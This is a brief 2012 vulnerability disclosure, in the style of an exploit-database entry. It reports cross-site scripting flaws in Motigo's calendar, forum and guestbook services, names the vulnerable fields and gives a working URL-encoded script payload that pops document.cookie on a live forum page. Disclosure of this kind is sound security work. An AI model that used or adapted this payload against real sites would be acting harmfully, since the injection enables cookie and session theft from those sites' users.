# Exploit Title:  Motigo Forums/Calendar/Guestbook Cross Site Scripting
# Date: 28.01.2012
# Author: Sony
# Software Link:  http://motigo.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/motigo-forumscalendarguestbook-cross.html
..................................................................

Calendar:

Create our calendar, add new event --> in the Notes put our xss code and
add this event.

Demo:

http://36317.calendars.motigo.com/day/show/date/2012-01-28

Forums:

Our xss in the email_send.

http://94932.forums.motigo.com/?action=email_send&boarduser_id=   [our xss
is here]

Demo:

http://94932.forums.motigo.com/?action=email_send&boarduser_id=%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

Guestbooks:

Put our code in the Homepage and press button Submit.

Demo:

http://234402.guestbooks.motigo.com/?action=index